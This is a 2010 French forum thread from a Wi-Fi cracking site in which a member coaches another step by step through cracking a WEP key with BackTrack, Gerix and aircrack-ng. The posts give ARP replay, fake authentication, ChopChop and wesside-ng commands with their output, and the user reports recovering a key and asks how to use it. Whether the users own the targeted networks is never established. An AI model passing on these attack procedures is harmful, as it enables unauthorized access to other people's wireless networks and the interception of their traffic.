Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 20-02-2010 20:36:07

gbiafora
Membre Actif
Inscription : 05-02-2010
Messages : 41

problème wpe

Probléme key WEP ,salut, j'ai reçu la clé usb avec de la chip rtl 8187, bt4 installé sur hard disk,  j'ai fait des tests avec  gerix crack, l'usb et bien vu et  aussi en monitor mode mais puis quand j'envoie pour recevoir les paquets  il ne trouve pas de ivs,
j'ai fait nombreux guides mais rien pas de solution ,et peut-être un problème de driver? merci de voutre reponce,
voilà des renseignements de ma rtl8187,

[email protected]:~# modinfo rtl8187
filename: /lib/modules/2.6.30.9/kernel/drivers/net/wireless/rtl818x/rtl8187.ko
license: GPL
description: RTL8187/RTL8187B USB wireless driver
author: Larry Finger <[email protected]>
author: Hin-Tak Leung <[email protected]>
author: Herton Ronaldo Krzesinski <[email protected]>
author: Andrea Merello <[email protected]>
author: Michael Wu <[email protected]>
alias: usb:v1737p0073d*dc*dsc*dp*ic*isc*ip*
alias: usb:v1B75p8187d*dc*dsc*dp*ic*isc*ip*
alias: usb:v18E8p6232d*dc*dsc*dp*ic*isc*ip*
alias: usb:v13D1pABE6d*dc*dsc*dp*ic*isc*ip*
alias: usb:v1371p9401d*dc*dsc*dp*ic*isc*ip*
alias: usb:v114Bp0150d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0DF6p0028d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0DF6p000Dd*dc*dsc*dp*ic*isc*ip*
alias: usb:v03F0pCA02d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0846p4260d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0846p6A00d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0846p6100d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0789p010Cd*dc*dsc*dp*ic*isc*ip*
alias: usb:v0769p11F2d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0BDAp8198d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0BDAp8197d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0BDAp8189d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0BDAp8187d*dc*dsc*dp*ic*isc*ip*
alias: usb:v050Dp705Ed*dc*dsc*dp*ic*isc*ip*
alias: usb:v0B05p171Dd*dc*dsc*dp*ic*isc*ip*
depends: mac80211,eeprom_93cx6,cfg80211
vermagic: 2.6.30.9 SMP mod_unload 686

[email protected]:~# iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

wmaster0 no wireless extensions.

wlan0 IEEE 802.11bg ESSID:""
Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated
Tx-Power=0 dBm
Retry min limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Dernière modification par gbiafora (20-02-2010 20:45:40)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 20-02-2010 20:51:22

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : problème wpe

Salut Giovanni

Je ne connais pas bien Gerix, donc il faudrait que tu fasses d'abord des essais en ligne de commande pour vérifier que tout est OK. Donc dans l'ordre :

airmon-ng start wlan0
aireplay-ng -9 mon0

Si le test d'injection est OK (il devrait), tu peux passer à la suite :

airodump-ng -w capture -c <canal_cible> mon0
[autre terminal] aireplay-ng -1 10 -a <mac_ap_cible> mon0
[autre terminal] aireplay-ng -3 -b <mac_ap_cible> mon0

Ensuite, tu attends de choper un paquet ARP (pour ca il faut que tu aies un autre ordi sur le même réseau, qui génère du trafic). Une fois que tu en as trouvé un, aireplay va le réinjecter et tu vas voir les "data" augmenter dans airodump.
Une fois que tu as environ 10.000 data, tu peux lancer le crack (dans 1 autre terminal) :

aircrack-ng -z capture-01.cap

Pour plus de détails, regarde dans n'importe quel tutorial d'utilisation d'aircrack pour du WEP (il y en a plusieurs sur ce forum)

Hors Ligne

#3 20-02-2010 21:27:37

gbiafora
Membre Actif
Inscription : 05-02-2010
Messages : 41

Re : problème wpe

Salut antares145 toujours disponible merci, dans [autre terminal ]  que je dois mettre?

mais si pas  un autre terminal qui génère du trafic on ne peut pas faire?

Dernière modification par gbiafora (20-02-2010 21:44:44)

Hors Ligne

#4 20-02-2010 21:45:44

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : problème wpe

gbiafora a écrit :

Salut antares145 toujours disponible merci, dans [autre terminal ]  que je dois mettre?

Simplement ouvrir une nouvelle Konsole pour taper la commande qui suit wink donc à la fin, tu dois avoir 4 konsoles d'ouvertes :
- airodump-ng
- aireplay-ng -1
- aireplay-ng -3
- aircrack-ng

Comme je te l'ai dit, tu peux toruver des détails dans n'importe quel tutorial de crack wep wink

Hors Ligne

#5 20-02-2010 21:56:50

gbiafora
Membre Actif
Inscription : 05-02-2010
Messages : 41

Re : problème wpe

je peux leur ouvrir directement de: Radio network analysis >80211>all

mais si pas  un autre terminal qui génère du trafic on ne peut pas faire?

j'ai essayé de me attache  au modem de mon petit-fils free sans protection mais il n'arrive pas se mettre en communication.

Hors Ligne

#6 20-02-2010 22:06:24

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : problème wpe

Ca manque de détails, là, surtout sur le choix des termes hmm
- pour lancer les commandes, ne passe pas par le menu "Radio Network Analysis", ouvre directement une konsole (l'icône avec un écran noir dans la barre inférieure, la 5ème)
- générer du trafic à partir d'un autre terminal, non, ce n'est pas possible. Pour générer du trafic il faut déjà être connecté au réseau, et donc connaître la clé wink
- pour te connecter à un modem sans protection, il faut d'abord te mettre en mode "managed", puis utiliser Wicd (c'est le + simple)

Mais on s'éloigne du sujet initial, là... Ton problème était : "Gerix ne trouve pas d'IV's", la solution est "Il faut qu'un autre ordi sur le même réseau génère du trafic (p-ex : télécharge un fichier). Si tu ne sais pas le faire, tu dois regarder des guides sur les méyhodes "clientless", comme ChopChop ou Fragmentation...
Aucun problème de driver avec BT4, le RTL8187L marche sans problème smile

Hors Ligne

#7 20-02-2010 22:17:05

gbiafora
Membre Actif
Inscription : 05-02-2010
Messages : 41

Re : problème wpe

donc sans trafic du propriétaire du modem pas de key, même si le modem et allumé,?

Hors Ligne

#8 20-02-2010 22:24:56

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : problème wpe

Ca dépend... L'attaque la plus facile (ARP replay, la -3) a besoin d'un ARP valide à réinjecter. Pas de trafic, pas d'ARP, pas de clé, même si le modem est allumé wink
Si tu veux absolument trouver la clé sans trafic, tu peux utiliser les méthodes "clientless" comme la ChopChop, la Fragmentation, ou la très connue -p 0841 (j'ai l'impression de me répéter, là roll)
Tu peux aussi essayer d'utiliser l'outil wesside, qui est disponible sous backtrack. La seule chose à taper c'est [c]wesside-ng -i mon0 -v <adresse_mac__routeur>[/c] en remplaçant l'adresse mac du routeur (que tu peux trouver par Airodump).

Voilà, j'estime que je t'ai donné assez de pistes pour l'instant, je te laisse chercher avec ca de ton côté smile

Hors Ligne

#9 21-02-2010 11:29:15

gbiafora
Membre Actif
Inscription : 05-02-2010
Messages : 41

Re : problème wpe

Salut antares145 j'ai fait 2 tests un wep et un wpa avec les commande :

airmon-ng start wlan0
aireplay-ng -9 mon0

reponce avec un 3 com  chanel 11   signal -76  enc WEP WEP


[email protected]:~# aireplay-ng -9 mon0
11:05:07  Trying broadcast probe requests...
11:05:09  No Answer...
11:05:09  Found 0 APs
[email protected]:~# aireplay-ng -9 mon0
11:05:50  Trying broadcast probe requests...
11:05:52  No Answer...
11:05:52  Found 0 APs

pendant que sur un wpa la reponce et:


[email protected]:~# aireplay-ng -9 mon0
10:40:44  Trying broadcast probe requests...
10:40:45  No Answer...
10:40:45  Found 1 AP

10:40:45  Trying directed probe requests...
10:40:45  00:10:00:00:00:00 - channel: 1 - 'Alice-00000000'
10:40:49  Ping (min/avg/max): 1.710ms/12.560ms/38.013ms Power: -77.31
10:40:49  13/30:  43%

10:40:49  Injection is working!

donc où il se trouve le problème? merci

Hors Ligne

#10 21-02-2010 11:37:52

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : problème wpe

Le "problème" c'est que tu n'es pas sur le bon canal pour faire le test. Donc tu dois d'abord lancer [c]airodump-ng mon0[/c] pour avoir la liste de tous les réseaux, et regarder le canal (CH) sur lequel se trouve ton réseau WEP. Ensuite, tu coupes airodump, et tu le relances en fixant le canal : [c]airodump-ng -c <canal> mon0[/c]. Par exemple, si ton réseau se trouve que le canal 6, tu remplaces ]c]<canal>[/c] par 6. Puis tu coupes de nouveau airodump, et tu lances le test d'injection : [c]aireplay-ng -9 mon0[/c]. Là il devrait te marquer "found 1 AP".

Ensuite, sur le WPA apparemment il l'a trouvé (sans doute que tu étais sur le bon canal sans le savoir), mais tu vois qu'il mets "13/30 : 43%". Ca veut dire que ta carte injecte, mais mal, parce que seuls 43% des paquets que tu injectes atteignent le routeur. DOnc ou bien tu es trop loin de ton routeur (c'est possible), ou bien ta carte est de mauvaise qualité. C'est quel modèle, exactement, une Alfa ?

Hors Ligne

#11 21-02-2010 13:27:19

gbiafora
Membre Actif
Inscription : 05-02-2010
Messages : 41

Re : problème wpe

je fait airodump-ng mon0 j'à trouvé un seul  réseaux, avec toute les information
je fait airodump-ng -11  mon0 ( je de fautes) ne marche pas, alors j'ai laissé perdre et j'ai lancé GERIX wifi cracker
et  je suis ce guide

à dire d'abord que j'avais utilisé  pas mal de fois mais sans succès  et miracle cette fois à fonctionné en 4 minutes j'ai réussi à avoir le key 
KEY FOUND ! [01:01:01:01:01]  decrypted correctly :100%
peut-être avec les commandements qui tu m'as fait faire à réveillé quelque chose.
l'attaque a été de manière non-client (chopchop)
un autre guide pour la manière with Clients ici
.

Comment j'utilise le key trouvé sur vista?

Comment  je peu  mettre en mode "managed" su bt4 ma wifi?

en ce qui concerne le matériel et un adaptateur usb (BdM - Adattatore WLAN WiFi USB 200mW +5 dbi RTL8187L) a 15€ acheté sur ebay

je voudrais encore une fois te remercier pour ton aide et ta disposition  antares145, merci.

Dernière modification par gbiafora (24-02-2010 13:24:55)

Hors Ligne

#12 21-02-2010 14:36:26

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : problème wpe

Ah ben voilà ! smile Bien joué !

Je doute que "mes commandes" aient réveillé quoi que ce soit (normalement Gerix les fait lui-même), tu as peut-être juste eu + de chance cette fois-ci ! tongue
Pour ton matériel, je suppose que c'est une copie bon marché de ma AWUS036H, donc elle est compatible mais de moins bonne qualité (d'où le prix). tant mieux si c'est bon pour toi !

gbiafora a écrit :

Comment j'utilise le key trouvé sur vista?

Comment  je peu  mettre en mode "managed" su bt4 ma wifi?

- utiliser la clé sous Vista : normalement il suffit de coller ce que Gerix a trouvé dans le champs où Vista demande la clé réseau. Si ca ne marche pas, chercher sur Google comment entrer une "clé wep hex/hexa/hexadécimale" (les 3 appellations existent) dans Vista
- mettre ta carte en managed sous BackTrack se fait normalement tout seul quand tu utilises Wicd. Utilise la fonction de recherche du forum pour trouver comment ca marche wink

Ah, et quand tu poses des liens Youtube, pense à utiliser la balise "video", ca fait plus propre (dixit M1ck3y). Je me permets de corriger ton post pour ajouter les balises smile

Hors Ligne

#13 24-02-2010 22:16:22

gbiafora
Membre Actif
Inscription : 05-02-2010
Messages : 41

Re : problème wpe

voilà revenu le problème avec Gerix, j'ai dû réinstaller bt4 tout sur hard disk, mais cette fois je n'arrive pas avoir le key WEP parce que je de faute avec l'attaque  (Wep Attacks no-client) et le commande ( Create The ARP
packet to be injected on the victim access point) j'ai l'erreur  ( Error opening /root/.gerix-wifi-cracker/*.xor "packetforge-ng --help" for help. [Failure]  )

Quelqu'un à eu la même erreur, et réussi à résoudre? merci pour votre aide

Hors Ligne

#14 26-02-2010 14:33:45

gbiafora
Membre Actif
Inscription : 05-02-2010
Messages : 41

Re : problème wpe

j'ai essayé de faire les commande manuellement :

[email protected]:~# airodump-ng -c 11 -b 00:1A:C1:15:BE:34 -w cap mon0
Notice: Channel range already given


CH 11 ][ Elapsed: 3 mins ][ 2010-02-26 13:34

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH E

00:1A:C1:15:BE:34  -74 100     1986        0    0  11  54 . WEP  WEP    OPN  3

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

aucun client connexe attaque chopChop


[email protected]:~# aireplay-ng -1 0 -a 00:1A:C1:15:BE:34 -h 00:E0:4C:05:1A:32 mon0
13:31:11  Waiting for beacon frame (BSSID: 00:1A:C1:15:BE:34) on channel 11

13:31:11  Sending Authentication Request (Open System) [ACK]
13:31:11  Authentication successful
13:31:11  Sending Association Request [ACK]
13:31:11  Association successful :-) (AID: 1)


[email protected]:~# aireplay-ng -4 -b 00:1A:C1:15:BE:34 -h 00:E0:4C:05:1A:32 mon0
13:31:29  Waiting for beacon frame (BSSID: 00:1A:C1:15:BE:34) on channel 11
^Cad 1502 packets...

et ici qu'il bloque il tourne mais sans trouver rien et je pense qu'il aurait dû me donner la confirmation
avec Y et j'aurais dû avoir une autre interface de départ pas celle-là postée.

exemple aurait dû répondre ainsi

      Read 165 packets...

         Size: 86, FromDS: 1, ToDS: 0 (WEP)

         BSSID  =  00:14:6C:7E:40:80
         Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:40:F4:77:E5:C9

         0x0000:  0842 0000 ffff ffff ffff 0014 6c7e 4080  .B..........l~@.
         0x0010:  0040 f477 e5c9 603a d600 0000 5fed a222  .@.w..`:...._.."
         0x0020:  e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543  ...H......._=..C
         0x0030:  d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873  ....j.....%.[.(s
         0x0040:  16d4 43fb aebb 3ea1 7101 729e 65ca 6905  ..C...>.q.r.e.i.
         0x0050:  cfeb 4a72 be46                           ..Jr.F

Use this packet ? y

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
4 216 04-12-2016 16:20:59 par pwerrick
Problème reaver par Antho3674
4 313 15-11-2016 22:05:12 par kcdtv
3 344 14-08-2016 10:22:07 par MiscL
5 738 18-07-2016 23:13:58 par kcdtv
5 1866 13-07-2016 15:56:51 par jaues007

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.028 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]